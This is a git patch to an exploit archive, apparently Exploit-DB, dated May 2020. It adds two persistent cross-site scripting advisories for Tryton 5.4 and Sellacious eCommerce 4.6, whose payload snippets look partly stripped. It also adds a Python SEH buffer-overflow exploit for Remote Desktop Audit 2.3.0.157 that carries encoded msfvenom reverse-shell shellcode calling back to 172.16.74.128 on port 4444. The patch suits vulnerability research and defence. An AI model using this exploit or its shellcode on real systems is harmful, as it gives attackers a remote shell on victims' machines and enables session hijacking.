From fe5d64b70c151659323f9e30589a7304d344883e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 14 May 2020 05:01:49 +0000 Subject: [PATCH] DB: 2020-05-14 4 changes to exploits/shellcodes Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH) Tryton 5.4 - Persistent Cross-Site Scripting Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting --- exploits/php/webapps/48457.txt | 8 +- exploits/php/webapps/48466.txt | 171 ++++++++++++++++++++++++++++++++ exploits/php/webapps/48467.txt | 138 ++++++++++++++++++++++++++ exploits/windows/local/48465.py | 72 ++++++++++++++ files_exploits.csv | 3 + 5 files changed, 385 insertions(+), 7 deletions(-) create mode 100644 exploits/php/webapps/48466.txt create mode 100644 exploits/php/webapps/48467.txt create mode 100755 exploits/windows/local/48465.py diff --git a/exploits/php/webapps/48457.txt b/exploits/php/webapps/48457.txt index d654f1ff6..aa99ab715 100644 --- a/exploits/php/webapps/48457.txt +++ b/exploits/php/webapps/48457.txt @@ -37,10 +37,4 @@ Parameter: id (GET) [08:55:01] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.29 -back-end DBMS: MySQL >= 5.0.12 - -I am looking forward to you accepting and approving my PoC. - -Thankyou! - -Vu Tien Hoa \ No newline at end of file +back-end DBMS: MySQL >= 5.0.12 \ No newline at end of file diff --git a/exploits/php/webapps/48466.txt b/exploits/php/webapps/48466.txt new file mode 100644 index 000000000..bbc96dce0 --- /dev/null +++ b/exploits/php/webapps/48466.txt @@ -0,0 +1,171 @@ +# Exploit Title: Tryton 5.4 - Persistent Cross-Site Scripting +# Exploit Author: Vulnerability-Lab +# Date: 2020-05-13 +# Vendor Homepage: https://www.tryton.org/ +# Version: 5.4 +# Software Link: https://www.tryton.org/download + + +Document Title: +=============== +Tryton v5.4 - (Name) Persistent Cross Site Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2233 + + +Common Vulnerability Scoring System: +==================================== +4.4 + + +Product & Service Introduction: +=============================== +https://www.tryton.org/ & https://www.tryton.org/download + + +Affected Product(s): +==================== +Tryton Foundation +Product: Tryton v5.4 - CMS (Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2020-05-12: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +A persistent input validation web vulnerability has been discovered in +the official Tryton v5.4 web-application series. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise +browser to web-application requests from the application-side. + +The persistent vulnerability is located in the `name` parameter of the +`User Profile` module. Remote attackers with low +privileges are able to inject own malicious persistent script code as +name for user accounts. The injected code can be +used to attack the frontend or backend of the web-application. The +request method to inject is POST and the attack vector +is located on the application-side. Injection point is the profile input +field with the name value and the execute occurs +in the front ui on top right were the avatar is listed or in the admin +backend on the res.user;name="Users"&views. + +Successful exploitation of the vulnerabilities results in session +hijacking, persistent phishing attacks, persistent +external redirects to malicious source and persistent manipulation of +affected application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] User Profile + +Vulnerable Input(s): +[+] Name + +Vulnerable Parameter(s): +[+] name + +Affected Module(s): +[+] /index +[+] /model/res.user;name="Users"&views (backend) + + +Proof of Concept (PoC): +======================= +The persistent web vulnerability can be exploited by low privileged web +application user account with low user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Open the application and login to your low privileged user account +2. Move to the profile on top right side (click) +3. Inject test payload to the "Name" input field and save the entry +4. Execution occurs after save on top right and +/model/res.user;name="Users"&views of the admin backend +5. Successful reproduce of the persistent cross site vulnerability! + + +PoC: Payload +%20>"> + + +PoC: Vulnerable Source (Execution Point) +
+ + + +
+ + +--- PoC Session Logs [POST] --- +https://tryton.localhost:8080/tryton/ +Host: tryton.localhost:8080 +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: application/json +Authorization: Session +ZGVtbzoyOjMyYmIyOWE3ODYxMzA3NGVkZThlMDBhNmEyMWVkNzFhZTAxOGQwMzA1YTJhMGU1NTNjOWU2YTNhZWM5MzA1MzM= +X-Requested-With: XMLHttpRequest +Content-Length: 527 +Origin: https://tryton.localhost:8080 +Connection: keep-alive +Referer: https://tryton.localhost:8080/ +{"id":195,"method":"model.res.user.set_preferences","params":[{"name":"%20>">">", +"signature":"test +signature"},{"client":"1aab6de2-1f59-43de-b0d0-a8319558e4e8","warehouse":null,"employee":null,"company":1, +"company.rec_name":"Michael Scott Paper +Company","language":"en","language_direction":"ltr","groups":[5,15,16,13,19,20,17,9,10], +"locale":{"date":"%m/%d/%Y","grouping":[3,3,0],"decimal_point":".","thousands_sep":","},"company_work_time": +{"h":3600,"m":60,"s":1,"Y":6912000,"M":576000,"w":144000,"d":28800}}]} +- +POST: HTTP/2.0 200 OK +server: nginx/1.16.1 +content-type: application/json +access-control-allow-origin: https://tryton.localhost:8080 +vary: Origin +content-encoding: gzip + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/php/webapps/48467.txt b/exploits/php/webapps/48467.txt new file mode 100644 index 000000000..d3dbd0e76 --- /dev/null +++ b/exploits/php/webapps/48467.txt @@ -0,0 +1,138 @@ +# Exploit Title: Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting +# Exploit Author: gurbanli +# Date: 2020-05-13 +# Vendor Homepage: https://www.sellacious.com +# Version: 4.6 +# Software Link: https://www.sellacious.com/free-open-source-ecommerce-software + +Document Title: +=============== +Sellacious eCommerce - Multiple Persistent Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2226 + + +Common Vulnerability Scoring System: +==================================== +4.6 + + +Product & Service Introduction: +=============================== +https://www.sellacious.com/free-open-source-ecommerce-software + + +Vulnerability Disclosure Timeline: +================================== +2020-05-08: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +A persistent input validation web vulnerability has been discovered in +the official Sellacious eCommerce Shop CMS (2020 Q1). +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise +browser to web-application requests from the application-side. + +The cross site web vulnerabilities are located in the all the adress +input fields of the `Manage Your Addresses` module. +Remote attackers are able to register a low privilege user account to +inject own malicious script code to the adress +information page. The execution of the script code occurs each time the +adress information is used in the web ui of +the ecommerce application. The request method to inject is POST and the +attack vector is persistent on the application-side. + +Successful exploitation of the vulnerabilities results in session +hijacking, persistent phishing attacks, persistent +external redirects to malicious source and persistent manipulation of +affected application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Manage Your Addresses + +Vulnerable Input(s): +[+] Full name +[+] First name +[+] Middle name +[+] Last name +[+] Company +[+] PO Box +[+] Address +[+] Landmark + +Affected(s): +[+] index.php/manage-your-addresses +[+] Backend user adress information listing + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerabilities can be exploited by +remote attackers with user account and low user interaction. +For security demonstration or to reproduce the web vulnerability follow +the provided information and steps below to continue. + + +PoC: Exploitation + +
+
+
+ + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/windows/local/48465.py b/exploits/windows/local/48465.py new file mode 100755 index 000000000..b8b2e6ac4 --- /dev/null +++ b/exploits/windows/local/48465.py @@ -0,0 +1,72 @@ +# Exploit Title: Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH) +# Exploit Author: gurbanli +# Date: 2020-05-12 +# Vulnerable Software: Remote Desktop Audit 2.3.0.157 +# Vendor Homepage: https://lizardsystems.com +# Version: 2.3.0.157 +# Software Link: https://lizardsystems.com/download/rdaudit_setup.exe +# Tested on: Windows 7 x86 +f = file('payload.txt','w') + +""" +Same with LanSend 3.2, but with different ppr address. +PoC +1. Run exploit +2. Run Remote Desktop Audit and Click Add Computers Wizard +3. Choose import computers from file +4. Copy/paste payload.txt content into filename section +5. shellcode will be executed + +""" + +""" +msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' +""" + +shellcode = b"" +shellcode += b"\xda\xd0\xd9\x74\x24\xf4\x58\xbe\xa4\x95\xaf" +shellcode += b"\xc4\x2b\xc9\xb1\x52\x31\x70\x17\x03\x70\x17" +shellcode += b"\x83\x4c\x69\x4d\x31\x70\x7a\x10\xba\x88\x7b" +shellcode += b"\x75\x32\x6d\x4a\xb5\x20\xe6\xfd\x05\x22\xaa" +shellcode += b"\xf1\xee\x66\x5e\x81\x83\xae\x51\x22\x29\x89" +shellcode += b"\x5c\xb3\x02\xe9\xff\x37\x59\x3e\xdf\x06\x92" +shellcode += b"\x33\x1e\x4e\xcf\xbe\x72\x07\x9b\x6d\x62\x2c" +shellcode += b"\xd1\xad\x09\x7e\xf7\xb5\xee\x37\xf6\x94\xa1" +shellcode += b"\x4c\xa1\x36\x40\x80\xd9\x7e\x5a\xc5\xe4\xc9" +shellcode += b"\xd1\x3d\x92\xcb\x33\x0c\x5b\x67\x7a\xa0\xae" +shellcode += b"\x79\xbb\x07\x51\x0c\xb5\x7b\xec\x17\x02\x01" +shellcode += b"\x2a\x9d\x90\xa1\xb9\x05\x7c\x53\x6d\xd3\xf7" +shellcode += b"\x5f\xda\x97\x5f\x7c\xdd\x74\xd4\x78\x56\x7b" +shellcode += b"\x3a\x09\x2c\x58\x9e\x51\xf6\xc1\x87\x3f\x59" +shellcode += b"\xfd\xd7\x9f\x06\x5b\x9c\x32\x52\xd6\xff\x5a" +shellcode += b"\x97\xdb\xff\x9a\xbf\x6c\x8c\xa8\x60\xc7\x1a" +shellcode += b"\x81\xe9\xc1\xdd\xe6\xc3\xb6\x71\x19\xec\xc6" +shellcode += b"\x58\xde\xb8\x96\xf2\xf7\xc0\x7c\x02\xf7\x14" +shellcode += b"\xd2\x52\x57\xc7\x93\x02\x17\xb7\x7b\x48\x98" +shellcode += b"\xe8\x9c\x73\x72\x81\x37\x8e\x15\x02\xd7\xda" +shellcode += b"\x65\x32\xda\xda\x74\x9f\x53\x3c\x1c\x0f\x32" +shellcode += b"\x97\x89\xb6\x1f\x63\x2b\x36\x8a\x0e\x6b\xbc" +shellcode += b"\x39\xef\x22\x35\x37\xe3\xd3\xb5\x02\x59\x75" +shellcode += b"\xc9\xb8\xf5\x19\x58\x27\x05\x57\x41\xf0\x52" +shellcode += b"\x30\xb7\x09\x36\xac\xee\xa3\x24\x2d\x76\x8b" +shellcode += b"\xec\xea\x4b\x12\xed\x7f\xf7\x30\xfd\xb9\xf8" +shellcode += b"\x7c\xa9\x15\xaf\x2a\x07\xd0\x19\x9d\xf1\x8a" +shellcode += b"\xf6\x77\x95\x4b\x35\x48\xe3\x53\x10\x3e\x0b" +shellcode += b"\xe5\xcd\x07\x34\xca\x99\x8f\x4d\x36\x3a\x6f" +shellcode += b"\x84\xf2\x5a\x92\x0c\x0f\xf3\x0b\xc5\xb2\x9e" +shellcode += b"\xab\x30\xf0\xa6\x2f\xb0\x89\x5c\x2f\xb1\x8c" +shellcode += b"\x19\xf7\x2a\xfd\x32\x92\x4c\x52\x32\xb7" + +""" +047FFF09 59 POP ECX +047FFF0A 59 POP ECX +047FFF0B 80C1 64 ADD CL,64 +047FFF0E ^FFE1 JMP ECX +""" +jmp_to_shellcode = '\x59\x59\x80\xc1\x64\xff\xe1' + +"""ppr 00418230""" + +payload = '\x90' * 30 + shellcode + jmp_to_shellcode + 'A' * 12 + '\xeb\xeb\x90\x90' + '\x30\x82\x41' +f.write(payload) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a6ab436ac..d9ca816fd 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11070,6 +11070,7 @@ id,file,description,date,author,type,platform,port 48415,exploits/windows/local/48415.py,"Frigate 3.36 - Buffer Overflow (SEH)",2020-05-04,"Xenofon Vassilakopoulos",local,windows, 48418,exploits/windows/local/48418.txt,"Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path",2020-05-05,"Nguyen Khang",local,windows, 48448,exploits/windows/local/48448.txt,"SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions",2020-05-11,"Jens Regel",local,windows, +48465,exploits/windows/local/48465.py,"Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)",2020-05-13,gurbanli,local,windows, 48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows, 48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 @@ -42694,3 +42695,5 @@ id,file,description,date,author,type,platform,port 48459,exploits/java/webapps/48459.txt,"Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting",2020-05-12,"Dylan Garnaud",webapps,java, 48460,exploits/php/webapps/48460.txt,"qdPM 9.1 - Arbitrary File Upload",2020-05-12,Besim,webapps,php, 48462,exploits/java/webapps/48462.py,"TylerTech Eagle 2018.3.11 - Remote Code Execution",2020-05-12,"Anthony Cole",webapps,java, +48466,exploits/php/webapps/48466.txt,"Tryton 5.4 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php, +48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,